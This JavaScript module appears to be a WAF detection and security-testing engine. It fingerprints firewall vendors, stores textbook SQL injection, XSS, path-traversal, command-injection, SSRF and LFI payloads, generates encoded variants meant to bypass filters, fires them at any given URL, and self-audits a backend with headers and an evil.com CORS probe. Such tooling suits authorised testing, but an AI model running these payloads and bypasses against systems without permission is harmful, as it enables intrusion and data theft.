/**
 * WAF Detection Engine - Pure JavaScript
 * Detects WAF vendors, generates payloads, tests security
 */

// WAF vendor signatures (passive detection via headers/responses)
const WAF_SIGNATURES = {
  cloudflare: {
    headers: ['cf-ray', 'cf-request-id', '__cfduid'],
    cookies: ['__cflb', '__cfuid'],
    blockPage: ['cloudflare', 'ray id', 'attention required'],
  },
  aws_waf: {
    headers: ['x-amzn-requestid', 'x-amz-cf-id'],
    blockPage: ['request blocked'],
  },
  imperva: {
    headers: ['x-iinfo', 'x-cdn'],
    cookies: ['incap_ses', 'visid_incap'],
    blockPage: ['incapsula', '_incident_id'],
  },
  akamai: {
    headers: ['akamai-origin-hop', 'akamai-cache-status'],
    blockPage: ['akamai', 'reference #'],
  },
  f5_asm: {
    headers: ['x-wa-info'],
    cookies: ['TS'],
    blockPage: ['the requested url was rejected'],
  },
  modsecurity: {
    blockPage: ['mod_security', 'this error was generated by mod_security'],
  },
  sucuri: {
    headers: ['x-sucuri-id', 'x-sucuri-cache'],
    blockPage: ['sucuri website firewall'],
  },
  wordfence: {
    headers: ['wordfence'],
    blockPage: ['generated by wordfence'],
  },
};

// Attack payloads by category (offline, no external fetch)
const PAYLOADS = {
  sql_injection: [
    "' OR '1'='1",
    "1' UNION SELECT NULL--",
    "admin'--",
    "' OR 1=1--",
    "1' AND 1=0 UNION ALL SELECT 'admin', 'pass'--",
  ],
  xss: [
    '<script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
    '<svg/onload=alert(1)>',
    'javascript:alert(1)',
    '<iframe src=javascript:alert(1)>',
  ],
  path_traversal: [
    '../../../etc/passwd',
    '..\\..\\..\\windows\\system.ini',
    '/etc/passwd',
    '....//....//....//etc/passwd',
  ],
  command_injection: [
    '; ls -la',
    '| whoami',
    '`cat /etc/passwd`',
    '$( cat /etc/passwd )',
  ],
  ssrf: [
    'http://169.254.169.254/latest/meta-data/',
    'http://localhost:22',
    'file:///etc/passwd',
  ],
  lfi: [
    'php://filter/convert.base64-encode/resource=index.php',
    'file:///etc/passwd',
    'expect://ls',
  ],
};

/**
 * Detects WAF presence and type
 */
export async function detectWAF(url) {
  const result = {
    detected: false,
    type: null,
    confidence: 0,
    method: null,
    evidence: [],
  };

  try {
    // Phase 1: Passive detection (headers)
    const response = await fetch(url, {
      headers: { 'User-Agent': 'Mozilla/5.0 (WAF-Scanner/1.0)' },
    });

    const headers = Object.fromEntries(response.headers.entries());
    const cookies = headers['set-cookie'] || '';

    for (const [vendor, sigs] of Object.entries(WAF_SIGNATURES)) {
      let score = 0;

      // Check headers
      if (sigs.headers) {
        for (const header of sigs.headers) {
          if (headers[header] || headers[header.toLowerCase()]) {
            score += 30;
            result.evidence.push(`Header: ${header}`);
          }
        }
      }

      // Check cookies
      if (sigs.cookies) {
        for (const cookie of sigs.cookies) {
          if (cookies.includes(cookie)) {
            score += 20;
            result.evidence.push(`Cookie: ${cookie}`);
          }
        }
      }

      if (score >= 30) {
        result.detected = true;
        result.type = vendor;
        result.confidence = Math.min(score, 100);
        result.method = 'passive';
        break;
      }
    }

    // Phase 2: Active detection (trigger with probe)
    if (!result.detected) {
      const probeUrl = url + '?test=' + encodeURIComponent("' OR 1=1--");
      const probeResp = await fetch(probeUrl);
      const bodyText = await probeResp.text();

      for (const [vendor, sigs] of Object.entries(WAF_SIGNATURES)) {
        if (sigs.blockPage) {
          for (const pattern of sigs.blockPage) {
            if (bodyText.toLowerCase().includes(pattern.toLowerCase())) {
              result.detected = true;
              result.type = vendor;
              result.confidence = 70;
              result.method = 'active';
              result.evidence.push(`Block page: "${pattern}"`);
              break;
            }
          }
        }
        if (result.detected) break;
      }
    }
  } catch (error) {
    console.error('WAF detection error:', error.message);
  }

  return result;
}

/**
 * Generates encoded/obfuscated payload variants
 */
export function generateBypassVariants(payload, type) {
  const variants = [payload]; // Original

  if (type === 'sql_injection') {
    // SQL obfuscation
    variants.push(payload.replace(/ /g, '/**/')); // Comment spaces
    variants.push(payload.replace(/ /g, '%09')); // Tab instead of space
    variants.push(payload.replace(/OR/gi, '||')); // Logical OR operator
    variants.push(payload.toUpperCase()); // Case variation
    variants.push(payload.toLowerCase());
  }

  if (type === 'xss') {
    // XSS obfuscation
    variants.push(payload.replace(/<script>/gi, '<ScRiPt>')); // Mixed case
    variants.push(payload.replace(/alert/g, 'prompt')); // Function variant
    variants.push(encodeURIComponent(payload)); // URL encoding
    variants.push(payload.replace(/ /g, '/**/')); // Comment injection
  }

  // Universal encodings
  variants.push(encodeURIComponent(encodeURIComponent(payload))); // Double URL encode
  variants.push(Buffer.from(payload).toString('base64')); // Base64

  return [...new Set(variants)]; // Remove duplicates
}

/**
 * Tests a single payload against URL
 */
export async function testPayload(url, payload, category) {
  const result = {
    payload,
    category,
    blocked: false,
    status: null,
    responseTime: 0,
    error: null,
  };

  try {
    const testUrl = url + (url.includes('?') ? '&' : '?') + 'test=' + encodeURIComponent(payload);
    const startTime = Date.now();

    const response = await fetch(testUrl, {
      headers: { 'User-Agent': 'Mozilla/5.0' },
      redirect: 'manual',
    });

    result.responseTime = Date.now() - startTime;
    result.status = response.status;

    // Blocked indicators: 403, 406, 429, redirects to block pages
    if ([403, 406, 429, 503].includes(response.status)) {
      result.blocked = true;
    } else if ([301, 302, 307, 308].includes(response.status)) {
      const location = response.headers.get('location') || '';
      if (location.includes('block') || location.includes('denied')) {
        result.blocked = true;
      }
    }
  } catch (error) {
    result.error = error.message;
    result.blocked = true; // Assume blocked if request fails
  }

  return result;
}

/**
 * Self-audit Agent Player backend security
 */
export async function selfAudit(backendUrl) {
  const issues = [];

  try {
    // Test 1: Security headers
    const response = await fetch(backendUrl + '/api/database/stats');
    const headers = Object.fromEntries(response.headers.entries());

    if (!headers['x-content-type-options']) {
      issues.push({
        severity: 'medium',
        type: 'Missing Security Header',
        detail: 'X-Content-Type-Options header not set',
        recommendation: 'Add header: X-Content-Type-Options: nosniff',
      });
    }

    if (!headers['x-frame-options']) {
      issues.push({
        severity: 'medium',
        type: 'Missing Security Header',
        detail: 'X-Frame-Options header not set (clickjacking risk)',
        recommendation: 'Add header: X-Frame-Options: DENY',
      });
    }

    if (!headers['strict-transport-security']) {
      issues.push({
        severity: 'low',
        type: 'Missing Security Header',
        detail: 'HSTS not enabled (localhost only, expected)',
        recommendation: 'Add HSTS in production: Strict-Transport-Security: max-age=31536000',
      });
    }

    if (!headers['content-security-policy']) {
      issues.push({
        severity: 'medium',
        type: 'Missing Security Header',
        detail: 'Content-Security-Policy header not set',
        recommendation: 'Add CSP to prevent XSS attacks',
      });
    }

    // Test 2: CORS configuration
    const corsTest = await fetch(backendUrl + '/api/database/stats', {
      headers: { 'Origin': 'https://evil.com' },
    });
    const corsHeaders = Object.fromEntries(corsTest.headers.entries());

    if (corsHeaders['access-control-allow-origin'] === '*') {
      issues.push({
        severity: 'high',
        type: 'CORS Misconfiguration',
        detail: 'CORS allows all origins (wildcard)',
        recommendation: 'Restrict CORS to specific origins (http://localhost:41521)',
      });
    }

    // Test 3: Error info disclosure
    const errorTest = await fetch(backendUrl + '/api/invalid-endpoint-xyz');
    const errorText = await errorTest.text();

    if (errorText.includes('at ') || errorText.includes('.ts:')) {
      issues.push({
        severity: 'low',
        type: 'Information Disclosure',
        detail: 'Stack traces exposed in error responses',
        recommendation: 'Disable stack traces in production',
      });
    }
  } catch (error) {
    console.error('Self-audit error:', error.message);
  }

  return {
    totalIssues: issues.length,
    highSeverity: issues.filter(i => i.severity === 'high').length,
    mediumSeverity: issues.filter(i => i.severity === 'medium').length,
    lowSeverity: issues.filter(i => i.severity === 'low').length,
    issues,
  };
}

/**
 * Get all payload categories
 */
export function getPayloadCategories() {
  return Object.keys(PAYLOADS).map(key => ({
    id: key,
    name: key.replace(/_/g, ' ').toUpperCase(),
    count: PAYLOADS[key].length,
  }));
}

/**
 * Get payloads for specific category
 */
export function getPayloads(category) {
  return PAYLOADS[category] || [];
}
